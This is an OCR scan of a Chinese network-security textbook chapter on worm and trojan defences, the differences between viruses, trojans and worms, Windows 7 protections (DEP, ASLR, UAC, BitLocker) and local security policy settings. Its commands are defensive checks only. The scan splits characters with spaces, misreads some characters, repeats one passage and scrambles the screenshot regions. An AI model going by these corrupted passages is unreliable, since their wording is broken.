中 心 发 送 报警 ; 也 可 以 使 用 类 似 数字 免疫 系统 的 方式 ,对 蠕虫 攻击 立即 做 出 反应 ,防范 零 
日 攻击 。 

图 12-6 所 示 系 统 的 工作 过 程 如 下 : 

(1) 感应 器 负责 检测 潜在 蠕虫 ,可 以 与 IPS 的 传感器 共同 工作 。 

(2) 感应 器 向 中 心服 务 器 报警 ,服务 器 关联 分 析 报 警 ,确定 当前 报警 的 关键 特征 以 及 
与 其 他 蠕虫 攻击 的 相似 度 。 

(3) 服务 器 将 关联 分 析 结 果 发 送 到 一 个 受 保护 的 沙 箱 环境 中 ,在 其 中 对 潜在 蠕虫 进 
行 分 析 和 测试 。 

(4) 在 沙 箱 中 选择 蠕虫 感染 的 目标 应 用 程序 对 潜在 蠕虫 进行 测试 ,尝试 发 现 蠕虫 的 
弱点 。 
(5) 沙 箱 产 生 一 个 或 多 个 补丁 程序 ,并 对 它们 进行 测试 。 

(6) 如 果 补 丁 程序 不 会 受 传染 ,并且 应 用 程序 的 功能 不 会 受到 影响 , 则 将 补丁 程序 发 
送 到 主机 上 对 有 漏洞 的 应 用 程序 进行 更 新 。 


12.1.3 木马 及 其 防范 方法 


木马 的 全 称 是 特洛伊 木马 (Trojan Horse) , 指 攻击 者 安装 在 目标 主机 上 秘密 运行 的 
程序 ,用 于 窍 取信 息 和 远程 控制 。 木 马 对 网 络 安全 造成 极 大 危害 ,是 造成 隐私 泄露 垃圾 
邮件 和 DDoS 攻击 的 重要 原因 。 木 马 包括 服务 器 程序 和 客户 程序 ,服务 器 程序 在 目标 主 
机 运行 ,负责 打开 攻击 通道 ,也 是 通常 所 说 的 木马 程序 ; 客户 程序 在 攻击 者 主机 运行 , 负 
责 与 目标 主机 建立 远程 连接 并 进行 通信 ,发 出 各 种 攻击 指令 。 网 页 木马 通常 由 
JavaScript、VBScript、.PHP、ASP、JSP 和 ActiveX 等 脚本 语言 编写 ,通过 浏览 器 传播 , 当 
用 户 访问 网 站 时 ,网 页 木马 在 浏览 器 中 执行 ,进而 在 主机 上 安装 木马 服务 程序 。 

木马 通常 具有 隐蔽 性 和 非法 访问 的 特点 ,服务 程序 会 采用 第 5. 3. 1 节 和 5. 3. 2 节 描 
述 的 各 种 方法 隐 项 自己 ,然后 与 客户 程序 建立 远程 连接 并 且 非 法 修改 注册 表 、 非 法 修改 系 
统 文件 .控制 鼠标 和 键盘 等 。 实 现 一 个 完整 的 木马 需要 综合 运用 许多 技术 ,包括 远程 启 
动 . 自 动 隐藏 .自动 加 载 等 。 尽 管 它们 使 用 的 技术 千变万化 ,但 是 木马 的 攻击 原理 始终 没 
有 变化 : 通过 客户 程序 向 服务 器 程序 发 送 指令 ,服务 器 程序 接收 控制 指令 后 ,根据 指令 在 
本 地 执行 相应 动作 ,并 把 执行 结果 返回 给 客户 程序 。 

木马 的 防范 方法 主要 有 以 下 几 种 。 

1. 检测 网 络 通信 状态 

许多 木马 会 主动 打开 端口 监听 或 者 连接 特定 的 域名 、IP 和 端口 ,所 以 可 以 在 关闭 所 
有 正常 网 络 程序 的 情况 下 ,检查 网 络 连接 状态 (如 netstat -ano) 检 测 木马 ,一 旦 存在 不 熟 
悉 的 程序 和 奇怪 的 端口 正在 运行 ,就 可 以 马上 发 现 并 及 时 跟踪 相应 的 进程 ,找到 木马 程序 
Panel 
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据 进出 网 卡 , 如 果 不 断 有 报 文 进出 ,很 有 可 能 有 木马 的 服务 程序 正在 运行 。 

2. 查看 进程 与 服务 

系统 服务 是 许多 木马 用 于 保持 自己 在 系统 中 永久 执行 的 方法 之 一 ,可 以 使 用 “net 
start” 或 “services. msc” 程 序 观察 当前 正在 运行 哪些 服务 。 对 于 可 疑 服务 ,可 以 用 “net 
stop” 或 者 手动 停止 运行 。 运 行 任务 管理 器 “taskmgr. exe”, 查 看 系统 当前 运行 的 所 有 进 
程 ,安全 人 员 需 要 对 系统 非常 熟悉 ,知道 每 个 进程 的 作用 。 当 列表 中 出 现 可 疑 进程 时 ,可 
以 进一步 确认 是 否 是 木马 服务 程序 。 

3. 查看 系统 启动 项 

木马 的 主要 启动 方式 之 一 是 注册 表 , 通 常 需要 对 注册 表 的 有 关 项 进行 仔细 检查 以 发 
现 可 疑 程序 。 应 用 Sysinternal 工具 集 的 “autoruns” 工 具 可 以 方便 地 观察 Windows 系统 
下 的 所 有 启动 项 ,包括 注册 表 、 系 统 托盘 .计划 任务 .输入 法 有 关 启 动 项 等 ,木马 服务 程序 
很 可 能 隐藏 在 这 些 地 方 。 如 果 发 现 可 疑 启动 项 ,立即 修改 配置 删除 有 关 启 动 项 ,系统 重启 
后 ,根据 启动 项 关联 的 程序 位 置 找到 木马 服务 程序 ,删除 即 可 。 

4. 查看 系统 账户 

如 果 系 统 被 植 人 木马 ,很 可 能 留 有 后 门 ,而 创建 系统 账户 是 后 门 常用 手段 。 使 用 "net 
user” 查 看 主机 有 哪些 用 户 ,并 使 用 *net user 用 户 名 ”查看 不 同 用 户 的 具体 权限 。 正 常情 
况 下 ,应 该 只 有 一 个 管理 员 用 户 , 如 果 有 其 他 用 户 在 管理 员 组 中 ,系统 很 有 可 能 已 经 被 木 
马 人 侵 。 

5. 应 用 工具 检测 

木马 检测 工具 可 分 为 两 类 : 中 通用 反 病 毒 软件 ,它们 利用 升级 病毒 特征 库 对 木马 进 
行 检测 和 清除 ,如 360 杀毒 ,卡巴 斯 基 等 ; @ 专 用 木马 查 杀 工具 ,它们 采用 动态 监视 网 络 
连接 和 静态 特征 码 扫描 相 结合 的 方式 ,对 通信 端口 .进程 列表 注册 表 的 启动 和 关联 项 、 磁 
盘 文 件 的 属性 进行 自动 的 动态 扫描 : 当 发 现 扫 描 结 果 与 特征 库 的 某 项 特征 码 匹配 时 , 即 可 
报警 。 

木马 不 断 采用 新 技术 来 躲避 安全 软件 的 检测 , 现 有 工具 无 法 百分之百 地 保证 系统 安 
全 运行 ,通常 与 其 他 工具 联合 对 系统 和 网 络 状态 进行 实时 监控 以 保护 系统 安全 。 一 些 高 
级 进程 管理 工具 具备 进程 监控 ,进程 查 杀 启动 监控 等 多 种 功能 ,可 以 提供 详细 的 进程 信 
息 , 显 示 隐 藏 进程 ,并 提供 协议 .端口 IP、 状 态 和 进程 路 径 等 信息 。 一 些 监视 软件 可 以 对 
系统 .设备 文件 .注册 表 、 网 络 连接 和 系统 账户 进行 全 面 监 控 , 提 供 详 细 的 时 间 、 动 作 和 状 
态 信息 ,并 可 以 保存 为 日 志 以 备 分 析 使 用 。 综 合 使 用 这 些 工 具 对 系统 进行 实时 监控 ,能 够 
及 时 发 现 系统 的 可 疑 行为 和 可 能 的 木马 入侵 ,同时 结合 反 病 毒 软件 、 防 火 墙 和 IPS, 就 能 
够 全 方位 实时 保护 系统 安全 。 

在 木马 防范 过 程 中 ,用 户 必须 加 强 安全 意识 ,避免 遭遇 社会 工程 学 攻击 : 

(1) 不 随便 下 载 软件 ,不 执行 任何 来 历 不 明 的 程序 。 

(2) 不 要 轻易 浏览 一 些 来 路 不 明 的 网 站 ,特别 是 有 不 良 内 容 的 网 站 。 

(3) 修改 浏览 器 的 安全 级 别 , 把 安全 级 别 由 “中 ” 改 为 “高 ”。 

(4) 不 随意 在 网 站 上 传播 个 人 邮箱 地 址 ,对 邮件 进行 过 滤 并 且 进 行 合理 设置 ,确保 邮 
件 防 病毒 功能 保持 开启 ,不 打开 陌生 人 发 来 的 邮件 和 附件 。 
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据 进出 网 卡 , 如 果 不 断 有 报 文 进出 ,很 有 可 能 有 木马 的 服务 程序 正在 运行 。 

2. 查看 进程 与 服务 

系统 服务 是 许多 木马 用 于 保持 自己 在 系统 中 永久 执行 的 方法 之 一 ,可 以 使 用 “net 
start” 或 “services. msc” 程 序 观察 当前 正在 运行 哪些 服务 。 对 于 可 疑 服务 ,可 以 用 “net 
stop” 或 者 手动 停止 运行 。 运 行 任务 管理 器 “taskmgr. exe”, 查 看 系统 当前 运行 的 所 有 进 
程 ,安全 人 员 需 要 对 系统 非常 熟悉 ,知道 每 个 进程 的 作用 。 当 列表 中 出 现 可 疑 进程 时 ,可 
以 进一步 确认 是 否 是 木马 服务 程序 。 

3. 查看 系统 启动 项 

木马 的 主要 启动 方式 之 一 是 注册 表 , 通 常 需要 对 注册 表 的 有 关 项 进行 仔细 检查 以 发 
现 可 疑 程序 。 应 用 Sysinternal 工具 集 的 “autoruns” 工 具 可 以 方便 地 观察 Windows 系统 
下 的 所 有 启动 项 ,包括 注册 表 、 系 统 托盘 .计划 任务 .输入 法 有 关 启 动 项 等 ,木马 服务 程序 
很 可 能 隐藏 在 这 些 地 方 。 如 果 发 现 可 疑 启动 项 ,立即 修改 配置 删除 有 关 启 动 项 ,系统 重启 
后 ,根据 启动 项 关联 的 程序 位 置 找到 木马 服务 程序 ,删除 即 可 。 

4. 查看 系统 账户 

如 果 系 统 被 植 人 木马 ,很 可 能 留 有 后 门 ,而 创建 系统 账户 是 后 门 常用 手段 。 使 用 "net 
user” 查 看 主机 有 哪些 用 户 ,并 使 用 *net user 用 户 名 ”查看 不 同 用 户 的 具体 权限 。 正 常情 
况 下 ,应 该 只 有 一 个 管理 员 用 户 , 如 果 有 其 他 用 户 在 管理 员 组 中 ,系统 很 有 可 能 已 经 被 木 
马 人 侵 。 

5. 应 用 工具 检测 

木马 检测 工具 可 分 为 两 类 : 中 通用 反 病 毒 软件 ,它们 利用 升级 病毒 特征 库 对 木马 进 
行 检测 和 清除 ,如 360 杀毒 ,卡巴 斯 基 等 ; @ 专 用 木马 查 杀 工具 ,它们 采用 动态 监视 网 络 
连接 和 静态 特征 码 扫描 相 结合 的 方式 ,对 通信 端口 .进程 列表 注册 表 的 启动 和 关联 项 、 磁 
盘 文 件 的 属性 进行 自动 的 动态 扫描 : 当 发 现 扫 描 结 果 与 特征 库 的 某 项 特征 码 匹配 时 , 即 可 
报警 。 

木马 不 断 采用 新 技术 来 躲避 安全 软件 的 检测 , 现 有 工具 无 法 百分之百 地 保证 系统 安 
全 运行 ,通常 与 其 他 工具 联合 对 系统 和 网 络 状态 进行 实时 监控 以 保护 系统 安全 。 一 些 高 
级 进程 管理 工具 具备 进程 监控 ,进程 查 杀 启动 监控 等 多 种 功能 ,可 以 提供 详细 的 进程 信 
息 , 显 示 隐 藏 进程 ,并 提供 协议 .端口 IP、 状 态 和 进程 路 径 等 信息 。 一 些 监视 软件 可 以 对 
系统 .设备 文件 .注册 表 、 网 络 连接 和 系统 账户 进行 全 面 监 控 , 提 供 详 细 的 时 间 、 动 作 和 状 
态 信息 ,并 可 以 保存 为 日 志 以 备 分 析 使 用 。 综 合 使 用 这 些 工 具 对 系统 进行 实时 监控 ,能 够 
及 时 发 现 系统 的 可 疑 行为 和 可 能 的 木马 入侵 ,同时 结合 反 病 毒 软件 、 防 火 墙 和 IPS, 就 能 
够 全 方位 实时 保护 系统 安全 。 

在 木马 防范 过 程 中 ,用 户 必须 加 强 安全 意识 ,避免 遭遇 社会 工程 学 攻击 : 

(1) 不 随便 下 载 软件 ,不 执行 任何 来 历 不 明 的 程序 。 

(2) 不 要 轻易 浏览 一 些 来 路 不 明 的 网 站 ,特别 是 有 不 良 内 容 的 网 站 。 

(3) 修改 浏览 器 的 安全 级 别 , 把 安全 级 别 由 “中 ” 改 为 “高 ”。 

(4) 不 随意 在 网 站 上 传播 个 人 邮箱 地 址 ,对 邮件 进行 过 滤 并 且 进 行 合理 设置 ,确保 邮 
件 防 病毒 功能 保持 开启 ,不 打开 陌生 人 发 来 的 邮件 和 附件 。 
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(5) 及 时 升级 浏览 器 和 更 新 各 种 安全 补丁 。 
12.1.4 不 同 恶意 代码 的 区 别 


病毒 .木马 和 蠕虫 是 三 种 常见 的 恶意 程序 ,可 以 导致 计算 机 或 计算 机 上 的 信息 损坏 ， 
使 得 网 络 和 操作 系统 变 慢 ,严重 时 会 完全 破坏 系统 。 人 们 往往 将 它们 统称 作 病毒 ,但 是 它 
们 之 间 存 在 很 大 差别 。 

病毒 必须 满足 两 个 条 件 ,一 是 能 自动 执行 ,二 是 能 自我 复制 。 另 外 ,病毒 具有 很 强 的 
传染 性 一定 的 潜伏 性 ,特定 的 触发 性 和 破坏 性 等 。 由 于 计算 机 病毒 的 特征 与 生物 学 的 特 
征 很 相似 ,人 们 才 将 这 种 恶意 代码 称 为 病毒 。 

木马 是 具有 欺骗 性 的 程序 ,是 一 种 基于 远程 控制 的 攻击 工具 ,具有 隐蔽 性 和 非法 访问 
的 特点 。 木 马 与 病毒 的 区 别 是 木马 不 具有 传染 性 , 它 不 会 像 病毒 那样 复制 自己 ,也 不 会 去 
刻意 传染 其 他 文件 ,主要 是 将 自己 隐蔽 起 来 。 现 在 的 木马 主要 以 窃取 信息 为 主 ,相对 病毒 
而 言 ,可 以 理解 为 病毒 破坏 信息 ,木马 窃取 信息 。 

广义 上 说 ,蠕虫 也 是 病毒 的 一 种 ,但 是 与 普通 病毒 有 很 大 区 别 。 蠕 虫 是 一 种 通过 网 络 
传播 的 恶性 病毒 ,具有 病毒 的 共性 ,如 传染 性 、 破 坏 性 等 ,同时 也 具有 自己 的 特点 ,如 独立 
性 。 普 通病 毒 需要 传染 其 他 文件 进行 复制 ,而 蠕虫 无 须 传染 文件 就 可 以 在 不 同 主机 之 间 
自我 复制 。 普 通病 毒 的 传染 能 力主 要 是 针对 文件 系统 的 文件 而 言 ,而 蠕虫 的 传染 目标 是 
Internet 的 所 有 主机 ,因此 蠕虫 的 破坏 性 比 普通 病毒 大 得 多 。 蠕 虫 可 以 在 短 时 间 内 突然 
爆发 ,大 规模 攻击 网 络 上 的 主机 ,也 会 消耗 大 量 带宽 和 内 存 , 导 致 主机 或 网 络 崩溃 。 

总 的 来 说 ,病毒 侧重 于 破坏 系统 和 程序 的 能 力 , 木 马 侧重 于 窃取 敏感 信息 的 能 力 , 蜂 
虫 侧 重 于 网 络 中 的 自我 复制 能 力 和 自我 传染 能 力 , 它 们 的 具体 区 别 如 表 12-1 所 列 。 


表 12-1 病毒 木马 和 蠕虫 的 区 别 



































病 毒 木 马 蠕虫 
存在 形式 | 寄生 独立 文件 独立 文件 
传染 途径 | 通过 宿主 程序 运行 | 植 人 目标 主机 系统 漏洞 
传染 速度 | 慢 最 慢 快 
攻击 目标 | 本 地 文件 文件 、 网 络 主机 存在 漏洞 的 网 络 程序 
触发 机 制 | 攻击 者 指定 条 件 自 启动 自动 攻击 有 漏洞 的 程序 
防范 方法 | 从 宿主 文件 中 清除 | 清除 启动 项 和 木马 服务 程序 ”| 更 新 安全 补丁 
对 抗 主体 | 用 户 , 反 病毒 软件 ”| 用 户 ,管理 员 , 反 病毒 软件 应 用 程序 供应 商 , 用 户 和 管理 员 





12.2 系统 安全 机 制 


12.2.1 Windows 7 安全 机 制 


Windows 7 于 2009 年 10 月 发 布 ,增加 了 较为 完善 的 安全 机 制 , 主 要 体现 在 内 核 完整 
性 、 内 存 保 护 和 用 户 权限 控制 ,如 表 12-2 所 列 。 内 存 保护 使 得 攻击 代码 在 目标 主机 上 很 
难 成 功 执行 ,用 户 权限 控制 使 得 攻击 代码 即使 执行 成 功 也 只 能 获取 较 低 的 权限 ,内 核 完整 
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性 使 得 攻击 代码 很 容易 被 目标 主机 检测 。 
表 12-2 Windows 7 安全 机 制 的 组 件 
































安全 机 制 内 核 完 整 性 内 存 保 护 用 户 权限 控制 
代码 完整 性 (Code Integrity) ”| 栈 溢出 处 理 (Guard Stack,GS) | 用 户 账户 控制 (UAC) 
驱动 程序 签名 (Driver | 安全 结构 化 异常 处 理 
Signature) (SafeSEH) ed 
安全 组 件 安全 内 核 (Patch Kernel) 数据 执行 保护 (DEP) 防火 墙 
地 址 空间 随机 分 布 (ASLR) 强制 完整 性 控制 
结构 化 异常 处 理 覆盖 保护 
(SEHOP) 反 间 谍 软 件 (Defender) 
安全 堆 管理 资源 保护 机 制 
1. 内 核 完整 性 


内 核 完整 性 机 制 包括 代码 完整 性 .驱动 程序 签名 和 安全 内 核 三 个 方面 。 代 码 完整 性 
和 驱动 程序 签名 使 用 静态 方法 验证 代码 的 完整 性 ,保证 即将 执行 的 代码 没有 被 自 改 。 
Windows 内 核 的 代码 完整 性 也 称 为 内 核 模式 代码 签名 (Kernel Mode Code Signature， 
KMCS) , 仅 允许 加 载 已 经 通过 CA 验证 并 且 经 过 数字 签名 的 设备 驱动 程序 。KMCS 使 用 
公 钥 加 密 技术 ,要求 第 三 方 代 码 必须 包含 CA 生成 的 数字 证 书 , 当 系统 加 载 这 些 代码 时 ， 
Windows 首先 利用 CA 的 公 钥 检查 证 书 的 真实 性 ,然后 使 用 存储 在 证 书 中 的 公 钥 解密 
验证 签名 信息 ,判定 代码 是 否 被 算 改 过 。 图 12-7 给 出 了 奇 虎 360 公司 在 Windows 7 上 
安装 的 360netmon. sys 驱动 的 签名 信息 ,可 以 看 到 它 有 两 份 签名 信息 ,其 中 一 份 签 名 由 
名 为 “Symantec Class 3 Extended Validation Code Signing CA” 的 认证 机 构 颁 发 数字 
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图 12-7 360netmon. sys 驱动 的 签名 示例 


安全 内 核 在 系统 运行 过 程 中 动态 检测 关键 数据 结构 和 代码 的 完整 性 ,只 应 用 在 64 位 
系统 中 ,能够 有 效 防 止 内 核 模式 驱动 程序 的 变动 或 者 替换 Windows 内 核 的 任何 部 分 ， 
第 三 方 代码 无 法 给 内 核 添加 任何 非法 补丁 ,传统 的 安全 防御 工具 也 同样 无 法 动态 修改 
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2. 内 存 保护 机 制 

Windows 7 的 内 存 保护 机 制 分 为 两 类 ,一 类 用 于 阻止 攻击 代码 执行 ,包括 栈 溢出 检 
测 、 安 全 结构 化 异常 处 理 (Safe Structural Exceptional Handling, SafeSEH) 、 数 据 执行 保 
护 (Data Execution Protection, DEP)、 地 址 空间 随机 分 布 (Address Space Layout 
Randomization, ASLR); 另 一 类 用 于 检测 内 存 泄 露 ,包括 SEH 覆盖 保护 (SEH Overwrite 
Protection,'SEHOP) 和 安全 堆 管理 。 

栈 溢出 检测 针对 经 典 的 缓冲 区 溢出 攻击 ,在 栈 帧 中 的 返回 地 址 前 面 放置 一 个 随机 数 
GS, 当 攻击 代码 尝试 通过 字符 串 复制 覆盖 栈 中 的 函数 返回 地 址 时 ,同时 会 覆盖 GS 所 在 
位 置 ,因此 GS 值 会 被 修改 。 在 系统 执行 函数 返回 语句 时 ,会 首先 检测 GS 值 是 否 被 修改 ， 
如 果 被 修改 ,系统 将 终止 程序 执行 并 报告 错误 ,使 得 攻击 代码 失败 。 只 要 攻击 者 无 法 推测 
或 者 搜索 到 GS 值 , 则 无 法 采用 经 典 攻击 方法 。 

SafeSEH 是 Windows 7 系统 对 错误 或 异常 的 一 种 处 理 机 制 ,在 执行 异常 处 理 程序 之 
前 ,首先 对 其 进行 检查 ,保证 其 没有 被 非法 自 改 ,否则 拒绝 执行 ,该 机 制 需 要 在 编译 应 用 程 
序 时 启用 。 对 于 没有 启动 SafeSEH 机 制 的 应 用 程序 ,系统 使 用 SEHOP 自动 在 SEH 链 
的 尾部 增加 一 个 用 于 认证 的 帧 检测 SEH 链 是 否 被 非法 修改 。 

DEP 用 于 将 指定 内 存 块 设置 为 不 可 执行 ,有 硬件 支持 模式 和 软件 支持 模式 ,如 果 
CPU 能 够 识别 内 存 不 可 执行 标记 就 是 硬件 支持 模式 。 系 统 如 果 将 分 配给 堆栈 的 内 存 设 
置 为 不 可 执行 ,那么 绝 大 部 分 缓冲 区 溢出 攻击 将 失去 作用 。 但 是 ,对 于 软件 支持 模式 , 攻 
击 者 可 以 动态 清除 内 存 块 的 不 可 执行 标志 以 达到 攻击 的 目的 ,因此 Windows 7 引入 了 
DEP 的 永久 标记 ,一 旦 进程 开始 执行 且 指 定 内 存 被 置 为 不 可 执行 ,该 标志 位 不 允许 被 
清除 。 

ASLR 是 一 种 预防 性 机 制 , 它 主要 对 系统 关键 地 址 进行 随机 化 ,避免 攻击 者 推导 或 猜 
测 目 标 主机 的 有 关 地 址 , 极 大 增加 了 攻击 难度 。ASLR 主要 包括 栈 地 址 、 堆 地 址 、 可 执行 
文件 的 基 址 和 进程 环境 块 (PCB) 地 址 的 随机 化 ,同一 个 程序 的 每 一 次 执行 ,这 些 地 址 都 不 
相同 ,系统 DLL 和 EXE 文件 的 加 载 地 址 则 是 每 次 系统 重新 启动 后 都 不 相同 。ASLR 使 
得 攻击 者 无 法 利用 固定 的 程序 和 结构 位 置 来 定位 攻击 代码 ,因为 目标 指令 位 置 不 固定 , 那 
么 执行 跳 转 就 非常 困难 ,常见 的 ROP 攻击 方式 也 会 失效 。ASLR 和 DEP 等 安全 机 制 互 
补 , 极 大 增加 了 系统 抵御 攻击 的 能 力 。 

3. 用 户 权限 控制 

Windows 7 对 基于 ACL 的 权限 控制 机 制 进行 了 改进 ,增加 了 强制 完整 性 级 别 的 概 
念 ,将 用 户 权限 划分 为 不 可 信 、 低 、 中 高、 系统、 安装 者 (TrustedInstaller) 等 级 别 。 其 中 ， 
不 可 信 级 别 赋予 匿名 登录 系统 的 进程 ; 低级 别 默认 赋予 与 网 络 进 行 交互 的 进程 ; 中 级 别 
为 标准 用 户 权限 ,只 能 执行 基本 操作 ,不 能 安装 程序 ,也 不 能 修改 系统 目录 等 关键 位 置 ; 
高 级 别 为 管理 员 权 限 ,允许 安装 程序 ,也 可 以 修改 关键 目录 ,但 是 其 使 用 受到 用 户 账户 控 
制 (User Account Control,UAC) 机 制 的 限制 ; 系统 级 别 为 系统 对 象 保留 ,内 核 和 关键 服 
务 运行 在 系统 级 别 , 它 比 管理 员 的 权限 更 高 ,可 以 控制 更 多 的 文件 和 注册 表 项 ; 安装 者 级 
别 为 系统 最 高 的 完整 性 级 别 , 可 以 任意 修改 关键 文件 。 

用 户 权 限 控制 机 制 主要 包括 UAC、 资 源 保护 、BitLocker、Defender 和 防火 墙 ( 见 
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用 户 账户 控制 (UAC) 是 权限 控制 中 最 重要 机 制 , 它 要 求 用 户 在 执行 可 能 会 影响 主机 
的 操作 或 者 在 更 改 配 置 之 前 ,提供 有 关 权 限 或 者 管理 员 密 码 。 系 统 给 用 户 提供 了 滑 块 模 
式 , 由 用 户 自主 决定 哪些 情况 下 需要 弹出 窗口 提示 ,有 以 下 模式 可 以 选择 (如 图 12-8 所 
示 ,模式 修改 后 需要 重新 启动 才能 够 生效 ) : 

(1) 任何 系统 级 别 的 变化 都 会 出 现 提示 窗口 ; 

(2) 有 程序 试图 改变 主机 配置 时 弹出 提示 窗口 , 当 用 户 通 过 控制 面板 等 正常 方式 修 
改 主机 配置 时 不 弹出 提示 窗口 ; 

(3) 与 模式 (2) 类 似 ,但 是 提示 窗口 只 出 现在 普通 桌面 ,不 使 用 安全 桌面 ; 

(4) 不 弹出 提示 窗口 ,相当 于 关闭 了 UAC。 























图 12-8 UAC 设置 示例 


Defender 是 一 个 用 于 清除 .隔离 和 预防 间谍 软件 的 工具 ,内 置 于 Windows 7 系统 中 ， 
它 可 以 扫描 系统 .对 系统 实时 监控 、 清 除 ActiveX 插件 和 许多 程序 的 历史 记录 ,如 图 12-9 
所 示 。 

资源 保护 机 制 用 于 保护 系统 关键 资源 不 会 被 有 意 或 者 无 意 修改 ,在 该 机 制 下 ,只 有 
TrustedInstaller 才 可 以 对 关键 资源 进行 修改 。 图 12-10 给 出 了 驱动 程序 “wmilib. sys” 的 
安全 访问 授权 示例 ,SYSTEM 账户 仅 拥有 读 取 和 执行 权限 ,而 TrustedInstaller 账户 拥有 
完全 控制 权限 。 但 是 ,管理 员 默 认 拥 有 ”文件 或 其 他 对 象 的 所 有 权 ”, 因 此 管理 员 可 以 通过 
修改 资源 的 拥有 者 间接 取得 所 保护 资源 的 所 有 权 , 也 就 拥有 了 修改 .删除 或 替换 资源 的 
权限 。 

BitLocker 加 密 系 统 驱 动 器 上 的 所 有 数据 保护 主机 数据 , 它 使 用 可 信 平 台 模 块 帮助 保 
护 系统 ,保证 即使 在 主机 丢失 或 被 盗 的 情况 下 数据 也 不 会 被 算 改 。 用 户 需 要 生成 一 个 密 
钥 并 安全 存放 ,这 样 即使 硬盘 被 抽取 出 来 被 安装 在 另外 的 主机 上 读 取 ,数据 也 不 会 泄露 , 
其 工作 方式 如 图 12-11 所 示 。 
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图 12-9 Defender 功能 界面 
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通过 对 驱动 器 进行 加 密 来 帮助 保护 您 的 文件 和 文件 夹 
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图 12-11 BitLocker 工作 方式 


12.2.2 ”Windows 安全 配置 


Windows 系统 的 版 本 众多 ,各 种 版 本 的 漏洞 都 不 少 , 但 是 经 过 适当 的 安全 设置 ,可 以 
消除 一 些 安全 隐患 ,提升 系统 的 安全 强度 。 

通用 的 Windows 系统 安全 策略 包括 账户 密码 策略 .账户 锁定 策略 ,账户 控制 策略 .用 
户 权限 分 配 策略 `. 计 算 机 安全 选项 .计算 机 审核 策略 .端口 和 服务 策略 ,文件 和 目录 安全 访 
问 策略 等 。 

1. 账户 密码 策略 

攻击 者 要 想 窃取 系统 内 的 重要 信息 或 执行 管理 功能 ,必须 先 获得 管理 员 权限 ,一 个 直 
接 的 方法 就 是 破解 管理 员 账 号 的 密码 。 从 理论 上 说 ,只 要 有 足够 时 间 ,使 用 字典 攻击 和 暴 
力 攻 击 可 以 破解 任何 密码 。 破 解 弱 密码 可 能 只 要 几 分 钟 ,而 破解 安全 性 较 高 的 强 密码 ,可 
能 要 花费 几 个 月 甚至 几 年 的 时 间 。 因 此 管理 员 账 号 必须 使 用 强 密码 ,而 且 要 定期 更 换 , 防 
止 被 破解 。 

密码 设置 的 安全 原则 要 满足 复杂 性 要 求 ,至 少 需要 6 个 字符 ,应 当 包含 英文 字母 大 小 
写 ,数字 、 可 打印 字符 甚至 是 非 打 印字 符 , 不 能 将 用 户 姓 名 、 生 日 和 电话 号 码 作为 密码 ,也 
不 要 将 常用 单词 作为 密码 。 密 码 应 定期 修改 ,避免 重复 使 用 旧 密 码 。 密 码 不 要 以 明文 方 
式 存放 在 系统 中 ,也 不 要 以 明文 方式 传递 ,避免 被 监听 和 截取 。 

Windows 的 账户 密码 策略 可 以 通过 "控制 面板 ”管理 工具 一“ 本 地 安全 策略 ?一 
“账户 策略 ”一 “密码 策略 ”设置 ,如 图 12-12 所 示 ,开启 复杂 性 要 求 , 设 置 密码 长 度 至 少 为 8 
字符 ,密码 最 长 使 用 时 间 为 42 天 ,如 果 用 户 尝 试 增加 密码 为 *123” 的 账号 “test” 时 ,系统 
提示 不 满足 复杂 性 要 求 。 

2. 账户 锁定 策略 

账户 锁定 策略 主要 是 设置 一 些 与 账户 登录 行为 相关 的 安全 策略 ,通过 “本 地 安全 策 
略 ”“ 账 户 策略 ”锁定 策略 ”设置 。 当 账户 登录 密码 尝试 失败 若干 次 以 后 ,可 以 在 一 段 
时 间 内 和 暂停 该 用 户 登录 ,这样 可 以 有 效 防止 远程 弱 口 令 攻击 ,可 以 配置 的 参数 包括 失败 的 
次 数 和 锁定 的 时 间 。 图 12-13 给 出 了 策略 锁定 示例 , 当 密 码 输 入 尝试 失败 达到 5 次 以 后 ， 
将 在 30min 内 不 允许 该 用 户 登 录 。 
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图 12-12 密码 策略 设置 示例 


文件 (F) 操作 (A) 查看 (V) 帮助 (H) 
ew*| OGIOm 


习 高 级 安全 Windows 防火 | 
习 网 络 列表 管理 器 策略 
司 公 钥 策略 





3 软件 限制 策略 

习 应 用 程序 控制 策略 

日 I 安全 策略 ,在 本 地 计 和 
3 高 级 审核 策略 配置 | 











sh Ctrl+Alt+Del 或 密码 保护 | 
站 或 成 员 服务 器 上 的 密码 





默认 值 : 0 





3. 账户 控制 策略 


账户 控制 策略 控制 账户 的 行为 和 状态 ,通过 “本 地 安全 策略 ”>“ 本 地 策略 ”>“ 安 全 选 
目的 安全 配置 策略 如 下 (图 12-14)。 
”标准 用 户 的 权限 提升 提示 : 











项 "设置 。 比 较 通 
(1)“ 启 
限 执行 某 项 操作 。 
(2)“ 启 
开启 UAC 策略 。 


(32 “村 
































目 " 以 管理 员 批准 模式 运行 月 


图 12-13 账户 锁定 策略 示例 


所 有 管理 员 账 号 


日 " 用 于 内 置 管理 员 账 号 的 管理 员 批准 模式 : 内 置 管理 员 账 


要 求 用 户 提供 管理 员 的 账号 和 密码 以 提升 权 


: 启用 管理 员 审批 模式 , 即 允 许 


2 
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图 12-14 账户 控制 策略 示例 


需要 采用 UAC 策略 。 

(4)“ 启 用 ”检测 应 用 程序 安装 并 提示 权限 提升 : 当 某 个 应 用 程序 安装 需要 提升 权限 
时 ,提示 用 户 输入 管理 员 账 号 和 密码 。 

(5)“ 禁 用 ”Guest 账户 号 状态 : 关闭 Guest 账号 。 

(6)“ 启 用 ”使 用 空 密码 的 本 地 账户 只 允许 控制 台 登 录 : 不 允许 空 密码 账户 远程 
登录 。 

(7) 重 命名 管理 员 账 户 : 将 Administrator 账户 换个 名 字 , 防 止 攻击 者 弱 口 令 攻 击 ， 
图 12-14 管理 员 账 号 名 字 被 重新 命名 为 "yangyang”。 

4. 用 户 权 限 分 配 策略 

用 户 权限 分 配 策略 用 于 将 不 同 的 系统 操作 授权 给 不 同 的 用 户 或 用 户 组 执行 ,将 执行 
的 操作 看 作 系统 资源 ,采用 ACL 的 方式 实现 。 通 过 “本 地 安全 策略 ”>“ 本 地 策略 >“ 用 
户 权 限 分 配 ? 设 置 ,常用 安全 配置 策略 如 下 (图 12-15) 。 

(1) 设置 “允许 从 网 络 访问 此 计算 机 ”的 账号 和 组 : 设置 为 指定 账号 ,图 12-15 中 设置 
只 允许 管理 员 账 号 “yangyang”。 

(2) 设置 “允许 管理 审核 和 安全 日 志 ” 的 账号 和 组 : 只 允许 管理 员 组 。 

